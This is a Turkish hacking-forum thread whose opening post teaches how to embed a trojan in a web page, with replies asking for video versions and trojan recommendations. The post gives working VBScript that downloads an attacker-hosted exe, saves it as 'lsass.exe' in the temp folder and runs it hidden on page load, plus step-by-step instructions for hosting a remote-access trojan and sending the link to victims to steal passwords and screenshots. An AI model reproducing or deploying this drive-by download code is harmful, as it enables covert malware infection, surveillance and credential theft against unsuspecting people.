Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





Web Siteye Trojan Yerleştirme

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 17-04-2019 19:11   #1
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 14
Teşekkür (Aldı): 3


Web Siteye Trojan Yerleştirme



KOD :

PHP Kod:
<script language="VBScript">
on error resume next
Set obj1 = ********.createElement("object")
obj1.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
est1="Microsoft."&"_xmlHTTP"A
Set obj2 = obj1.CreateObject(est1,"")

est="Ado"&"db."&"Str"&"eam"
set obj3 = obj1.createobject(est,"")
obj3.type = 1
est2="GET"
obj2.Open est2, "Serverınızın linki", False
obj2.Send

set F = obj1.createobject("Scripting.FileSystemObject","")
set pasta = F.GetSpecialFolder(2)
fi="lsass.exe"
fi= F.BuildPath(pasta,fi)

obj3.open
obj3.write obj2.responseBody
obj3.savetofile fi,2
obj3.close

set obj5 = obj1.createobject("Shell.Application","")

obj5.ShellExecute fi,"","","open",0
</script>


Merhaba arkadaşlar sizlere web sayfasına trojan gömmeyi anlatıcam.

Bu gördüğünüz kod sayesinde Yolu belirtilen serverımız siteye girilen kişinin bilgisayarı tarafından otomatik açılır.

Bu yöntem oldukça geçerlidir.Çünkü artık kimse msnde babasndan bile dosya almıyor.Ama sitede trojan olduğu çoğu kişinin hesabına gelmez.


Şimdi açıklamamı yapayım.

Serverınızın linki

Şimdi böyle bir kısım var.

Server nedir , Linkini nasıl alıcaz...

Server dediğimiz şey trojanlarda kendi bilgilerimizi ayarlayıp oluşturduğumuz dosyadır.Trojandan trojana özellikler değişir.Ama genelde mantık aynıdır.Karşı taraf exe yi açtığı zaman Bilgisayarında port açılır yani otomatik bi açık bırakılır.Ve bu sayede dosyayı yedirdiğimiz kişinin Ekranını bile izleyebiliriz.

Ben trojan olarak Turkojanı kullanıyorum.


Şimdi serverımızı oluşturduk diyelim Link nasıl alıcaz.
İlk önce bi web siteniz olması gerekiyor.Ücretsizde olabilir.

Örneğin Emre.com diye sitem olsun benim.

Ftp den bağlanıp benim server.exe mi anadizine atıyorum.

Ve link şöyle oluyor http://www.emre.com/server.exe

Buraya yüklendikten sonra internet explorerdan bu linki açıp kontrol ediyoruz.Bunu açtığınızda Çalıştır - Kaydet - İptal çıkar.Eğer çıkarsa olmuştur.Çıkmazsa sitenizin sunucusu güvenlik tarafından serverdaki exe uzantılarının çalıştırılmasını engellemiştir.Eğer öyleyse çalışmaz.
Yani serverınızı attığnız zaman mutlaka linke girdiğiniz zaman Çalıştır-Kaydet-İptal dalgası çıkması lazım.

Evet yapılacaklar bu kadar.

Özet olarak ; Servermızı oluşturduk ... server.exe
Sitemize upload ettik http://www.emre.com/server.exe oldu
Bu verdiğim kodları alın.Not defterine atın.
Kodun Serverınızın linki Kısmına "http://www.siteisminiz.com/server.exe"
yazın.Daha sonra farkı kaydet deyip.
.html uzantılı kaydedin.Mesela emre.html diye kaydettim.
o zmn http://www.emre.com/emre.html olur
Bu linki karşı tarafa attığım zaman.Kodlar sayesinde otomatik olarak ana dizindeki server.exe çalışacaktır.Ve Kurbanımız trojanı yemiş olacaktır.

Sonra şifreler, SS'ler, uzak masaüstü trojanınızın özelliğine göre kafanıza göre takılın.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Endofrin Teşekkür etti.
Alt 17-04-2019 20:32   #2
  • Yüzbaşı
  • Üye Bilgileri
Üyelik tarihi
06/2015
Nereden
PHP
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 88
Teşekkür (Aldı): 337




Server tipi önemli mi bu işlem.için veya eklenti gerekli mi?
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Alt 17-04-2019 20:42   #3
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
08/2018
Mesajlar
Konular
1

Teşekkür (Etti): 12
Teşekkür (Aldı): 4




Hangi trojan programını önerirsin?
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Alt 17-04-2019 20:46   #4
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
02/2019
Nereden
System32
Mesajlar
Konular

Teşekkür (Etti): 37
Teşekkür (Aldı): 30




aradigim bir mevzu bu , videolu anlatimi olsaydi daha guzel olurdu , mantigini anlatmissin, sagolasin



___________________________________________

Endofrin was here !
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Alt 17-04-2019 22:07   #5
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 14
Teşekkür (Aldı): 3




Alıntı:
NTM849´isimli üyeden Alıntı Mesajı göster
Hangi trojan programını önerirsin?
Ben trojan olarak Turkojanı kullanıyorum.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

NTM849 Teşekkür etti.
Alt 17-04-2019 22:08   #6
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 14
Teşekkür (Aldı): 3




Alıntı:
Endofrin´isimli üyeden Alıntı Mesajı göster
aradigim bir mevzu bu , videolu anlatimi olsaydi daha guzel olurdu , mantigini anlatmissin, sagolasin
Videoya almaya calisacagim ama mantigini anladiysan yaparsin devrem
 Offline  
 
Alıntı ile Cevapla
Teşekkür

NTM849 Teşekkür etti.
Alt 17-04-2019 22:14   #7
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2019
Mesajlar
Konular

Teşekkür (Etti): 62
Teşekkür (Aldı): 94




Konu içerik olarak yararlı fotoğraf vs. de eklerseniz güzel olurdu.



___________________________________________

“Bu Ülkeye 5 kuruş katkın yoksa 10 kuruşluk zarar Verme!”
Bir Hacker.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Alt 17-04-2019 22:18   #8
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
Konular

Teşekkür (Etti): 14
Teşekkür (Aldı): 3




Alıntı:
teguardian´isimli üyeden Alıntı Mesajı göster
Konu içerik olarak yararlı fotoğraf vs. de eklerseniz güzel olurdu.
Fotografli yapmaya calisacagim devrem Bakarsin videoya da alirim
 Offline  
 
Alıntı ile Cevapla
Alt 17-04-2019 22:27   #9
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
04/2019
Mesajlar
8
Konular
0

Teşekkür (Etti): 3
Teşekkür (Aldı): 2




Resim veya videolu anlatım olursa daha açıklayıcı olur gibi
birazcık karmaşık geldi,ama iyi bir taktik.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Alt 17-04-2019 22:28   #10
  • Üsteğmen
  • Üye Bilgileri
Üyelik tarihi
03/2019
Mesajlar
Konular

Teşekkür (Etti): 62
Teşekkür (Aldı): 94




Alıntı:
Poyrazxd´isimli üyeden Alıntı Mesajı göster
Fotografli yapmaya calisacagim devrem Bakarsin videoya da alirim
Beklemedeyim.İnceleyeceğim tekrar konunuzu.



___________________________________________

“Bu Ülkeye 5 kuruş katkın yoksa 10 kuruşluk zarar Verme!”
Bir Hacker.
 Offline  
 
Alıntı ile Cevapla
Teşekkür

Poyrazxd Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau